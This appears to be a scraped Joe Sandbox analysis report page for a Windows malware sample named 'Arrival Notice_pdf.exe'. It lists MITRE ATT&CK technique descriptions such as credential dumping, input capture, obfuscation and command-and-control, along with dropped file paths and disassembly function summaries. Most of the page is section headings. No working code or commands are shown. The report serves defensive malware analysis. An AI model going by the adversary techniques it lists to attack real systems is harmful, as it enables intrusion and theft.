Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Arrival Notice_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\283026M3L

C:\Users\user\AppData\Local\Temp\aut65C5.tmp

C:\Users\user\AppData\Local\Temp\peristeronic

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Arrival Notice_pdf.exe

Function 0026B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00243D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0025DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0024406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0028FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 00243F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0028BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00243742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00243E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00D08670 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre